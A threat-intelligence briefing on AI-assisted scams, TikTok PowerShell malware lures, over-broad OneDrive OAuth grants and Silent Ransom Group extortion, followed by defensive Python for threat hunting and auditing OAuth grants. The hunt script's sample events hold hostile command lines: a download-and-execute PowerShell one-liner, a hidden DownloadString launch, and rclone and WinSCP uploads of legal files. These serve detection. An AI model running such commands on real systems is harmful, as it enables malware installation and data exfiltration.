
Threat Intel Update
Cyber threat actors are constantly evolving their tactics and increasingly turning to artificial intelligence (AI) to scale their operations. AI lets them generate convincing video, audio and images to impersonate real people, produce polished promotional content for fake products and "cracked" software, and craft deceptive messages that trick users into running malware or handing over login credentials. The same technology also has legitimate uses: it helps organizations work more efficiently and surface useful signals in large volumes of data, including security telemetry.
Cybersecurity News
- FBI Warns of AI-Driven Impersonation Campaign Targeting Government Officials – The FBI has issued a public service announcement about an ongoing malicious campaign in which unidentified threat actors are using artificial intelligence to impersonate senior U.S. government officials. The attacks combine smishing (text) and vishing (voice), using spoofed phone numbers and AI-generated voices to build trust and then lure victims into clicking malicious links or disclosing sensitive information. While the primary targets have been current and former government officials, the FBI warns that the same tactics can be used against anyone. The public is urged to verify the identity of the sender of any unexpected message or call before responding, and to avoid interacting with suspicious links. IC3.gov
- TikTok Videos Spread Vidar and Stealc Malware Through Fake Activation Instructions – Cybercriminals are using TikTok videos, some potentially AI-generated, to distribute Vidar and Stealc information-stealing malware. The videos deceive viewers into running PowerShell commands disguised as activation steps for pirated or premium software. Once executed, the malware harvests credentials, browser data, and other sensitive information. Leveraging TikTok’s powerful algorithm, some of these malicious videos have reached over 500,000 views, underscoring the growing threat of social media-driven malware campaigns, particularly when amplified by AI-generated content. Trend Micro
- Researchers Warn of Excessive OneDrive Access Granted to Third-Party Apps – Hundreds of third-party applications, including Slack, Trello, and ChatGPT, may hold full access to users' entire Microsoft OneDrive storage because the OneDrive file picker requests overly broad OAuth permissions. A user who believes they are sharing a single file may unknowingly grant an application read and write access to their whole drive. The risk is amplified by vague consent prompts, which do not make the true scope clear, and by insecure storage of the resulting access tokens, which could enable data theft, tampering, or encryption. Researchers have disclosed the issue to Microsoft; organizations are urged to audit which applications hold delegated OneDrive permissions, revoke grants that exceed what the app actually needs, and avoid storing sensitive data in OneDrive without strong access controls. Dark Reading
- FBI Warns Law Firms Targeted by Silent Ransom Group – The FBI has issued an alert about the Silent Ransom Group (SRG), also known as Luna Moth or UNC3753, which is targeting U.S. law firms in a growing data-theft extortion campaign; the group has also attacked organizations in the medical and insurance sectors. SRG uses callback phishing: emails about fake "subscription fees" prompt recipients to call a provided number to cancel, and the caller then sends a malicious link that installs remote access software. In other cases, SRG poses as IT support and talks employees into granting remote access directly. Once inside, the group quickly exfiltrates sensitive data using tools such as WinSCP or Rclone and demands payment under the threat of publishing it; no file encryption is involved, so backups alone do not mitigate the attack. IC3.gov
- Apple Blocks Over $9 Billion in Fraudulent App Store Transactions Over Five Years – Apple has prevented more than $9 billion in potentially fraudulent transactions on the App Store over the past five years, underscoring its commitment to user and developer safety. The company identified and blocked approximately 4.7 million stolen credit cards and stopped over $2 billion in fraudulent charges in 2023 alone. In addition, Apple banned more than 1.6 million accounts, removed over 146,000 developer accounts for fraud or abuse, and rejected over 139,000 developer enrollments. These efforts are part of Apple’s broader strategy to maintain a secure, trusted app ecosystem through a combination of advanced technology and human oversight. Apple Newsroom
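Two of the items above describe behaviour that is easy to hunt for in endpoint logs: the TikTok lure has the victim paste a PowerShell command that downloads and runs a remote script, and the Silent Ransom Group alert names Rclone and WinSCP as the exfiltration tools. The following is an added example, not code from either source or from the briefing's authors. It runs two generic heuristic rules over constructed sample events shaped like PowerShell script-block logging and process-creation records. The exact commands used in the TikTok campaign are not given on this page, so rule 1 matches the general download-and-execute pattern rather than any specific indicator; all event contents, paths and hostnames below are made up for the example.

```python
"""Heuristic hunt rules for (1) download-and-execute PowerShell lures and
(2) Rclone / WinSCP exfiltration. Added example; sample events are constructed."""
import re

# --- Rule 1: PowerShell that fetches remote content AND executes it ---------
FETCH = re.compile(
    r"(?:\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest"
    r"|downloadstring|downloadfile|net\.webclient)", re.IGNORECASE)
EXECUTE = re.compile(r"(?:\biex\b|invoke-expression|\bstart-process\b)", re.IGNORECASE)
# Hidden window, execution-policy bypass, or an inline base64 payload.
EVASION = re.compile(
    r"(?:-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.IGNORECASE)

def ps_download_execute(script: str) -> bool:
    """A fetch on its own is common in admin tooling; the lure needs a fetch
    combined with either direct execution or a stealthy launch."""
    return bool(FETCH.search(script)) and bool(EXECUTE.search(script) or EVASION.search(script))

# --- Rule 2: Rclone / WinSCP pushing data to a remote endpoint --------------
RCLONE_VERBS = {"copy", "copyto", "sync", "move", "moveto"}
# rclone remote syntax is "name:path"; two or more chars before ':' rules out C:\ drive letters
RCLONE_REMOTE = re.compile(r"^[A-Za-z][\w-]+:")
WINSCP_OPEN = re.compile(r"\b(?:sftp|ftps?|scp|s3|webdav)://", re.IGNORECASE)
WINSCP_UPLOAD = re.compile(r"\b(?:put|synchronize\s+remote)\b", re.IGNORECASE)

def basename(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()

def exfil_tool(image: str, cmdline: str) -> bool:
    """Rclone with a transfer verb and a remote argument, or WinSCP opening a
    remote session and uploading. Listing or local-only use is not flagged."""
    exe = basename(image)
    args = cmdline.split()
    if exe in ("rclone.exe", "rclone"):
        return any(a in RCLONE_VERBS for a in args[1:]) and any(RCLONE_REMOTE.match(a) for a in args[1:])
    if exe in ("winscp.exe", "winscp.com"):
        return bool(WINSCP_OPEN.search(cmdline) and WINSCP_UPLOAD.search(cmdline))
    return False

def scan_events(events):
    """Return (rule_name, event_id) for every event that trips a rule."""
    hits = []
    for ev in events:
        if ev["type"] == "script_block" and ps_download_execute(ev["script"]):
            hits.append(("ps_download_execute", ev["id"]))
        elif ev["type"] == "process" and exfil_tool(ev["image"], ev["cmdline"]):
            hits.append(("exfil_tool", ev["id"]))
    return hits

# Constructed sample events (not real telemetry; hosts use documentation ranges).
SAMPLE_EVENTS = [
    {"id": 1, "type": "script_block", "script": r"irm https://example.invalid/activate.ps1 | iex"},
    {"id": 2, "type": "script_block", "script": r"Get-ChildItem C:\Temp | Measure-Object"},
    {"id": 3, "type": "script_block",
     "script": r"powershell -w hidden -ep bypass -c (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"},
    {"id": 4, "type": "process", "image": r"C:\Tools\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Shares\Legal mega:cases --transfers 16"},
    {"id": 5, "type": "process", "image": r"C:\Tools\rclone.exe", "cmdline": r"rclone.exe lsd mega:"},
    {"id": 6, "type": "process", "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "cmdline": r'WinSCP.exe /command "open sftp://svc@203.0.113.5/" "put C:\Shares\Legal\*.zip /in/" exit'},
    {"id": 7, "type": "process", "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c dir"},
]

if __name__ == "__main__":
    for rule, event_id in scan_events(SAMPLE_EVENTS):
        print(f"{rule}: event {event_id}")
```

Rule 1 requires PowerShell Script Block Logging (Event ID 4104) to be enabled, since the pasted command is only visible in its decoded form there; rule 2 works on any process-creation source that records the full command line (Sysmon Event ID 1 or Windows 4688 with command-line auditing). Expect some noise from backup jobs that legitimately use Rclone; allow-listing by signing account and destination remote is the usual fix.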
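The OneDrive item above ends with advice to audit app permissions. One concrete way to do that in Microsoft Entra ID is to list delegated OAuth grants (the Graph endpoint `GET /v1.0/oauth2PermissionGrants`, or `Get-MgOauth2PermissionGrant` from the Microsoft Graph PowerShell module) and flag any grant carrying a Microsoft Graph files scope that reaches beyond a single file. The following is an added example, not code from the researchers or from Microsoft. It works on a constructed response of that shape; the grant and service-principal identifiers are placeholders, and the page does not say which scope the file picker requests, so the example grades every broad `Files.*` scope rather than a specific one.

```python
"""Flag delegated OAuth grants whose Microsoft Graph file scopes exceed
single-file access. Added example; the input below is a constructed sample
shaped like a Graph oauth2PermissionGrants response."""

# Graph delegated scopes, graded by how much of the user's storage they expose.
BROAD_FILE_SCOPES = {
    "Files.ReadWrite.All": "high",    # every file the user can reach, incl. shared
    "Files.Read.All": "high",
    "Files.ReadWrite": "medium",      # the user's entire own drive
    "Files.Read": "medium",
}
# Least-privilege alternatives an app that needs one file or its own folder should request.
NARROW_FILE_SCOPES = {"Files.Read.Selected", "Files.ReadWrite.Selected", "Files.ReadWrite.AppFolder"}

def audit_grants(grants_response, sp_display_names):
    """Return findings for grants with broad file scopes, worst first.
    consentType 'AllPrincipals' means an admin consented tenant-wide."""
    findings = []
    for grant in grants_response.get("value", []):
        scopes = grant.get("scope", "").split()
        broad = [s for s in scopes if s in BROAD_FILE_SCOPES]
        if not broad:
            continue
        severity = "high" if any(BROAD_FILE_SCOPES[s] == "high" for s in broad) else "medium"
        findings.append({
            "grant_id": grant["id"],
            "app": sp_display_names.get(grant["clientId"], grant["clientId"]),
            "consent": grant.get("consentType"),
            "principal": grant.get("principalId") or "all users",
            "broad_scopes": broad,
            "already_narrow": sorted(s for s in scopes if s in NARROW_FILE_SCOPES),
            "severity": severity,
        })
    # tenant-wide high-severity grants first, then by app name for stable output
    findings.sort(key=lambda f: (f["severity"] != "high", f["consent"] != "AllPrincipals", f["app"]))
    return findings

# Constructed sample: placeholder object IDs, not real tenant data.
SAMPLE_SP_NAMES = {
    "sp-0001": "Board Planner (hypothetical)",
    "sp-0002": "Quick Notes (hypothetical)",
    "sp-0003": "Doc Picker Integration (hypothetical)",
}
SAMPLE_GRANTS = {"value": [
    {"id": "g1", "clientId": "sp-0003", "consentType": "AllPrincipals", "principalId": None,
     "resourceId": "sp-graph", "scope": "openid profile Files.ReadWrite.All"},
    {"id": "g2", "clientId": "sp-0002", "consentType": "Principal", "principalId": "user-42",
     "resourceId": "sp-graph", "scope": "Files.ReadWrite.AppFolder offline_access"},
    {"id": "g3", "clientId": "sp-0001", "consentType": "Principal", "principalId": "user-42",
     "resourceId": "sp-graph", "scope": "Files.ReadWrite User.Read"},
]}

if __name__ == "__main__":
    for f in audit_grants(SAMPLE_GRANTS, SAMPLE_SP_NAMES):
        print(f"[{f['severity']}] {f['app']} ({f['consent']}, {f['principal']}): {' '.join(f['broad_scopes'])}")
```

A tenant-wide (`AllPrincipals`) grant of `Files.ReadWrite.All` is the case to chase first: every user's drive is exposed through one app registration, and any leaked token for that app is enough to read or rewrite the files. Revocation is done by deleting the grant object, after which the app must re-consent with a narrower scope.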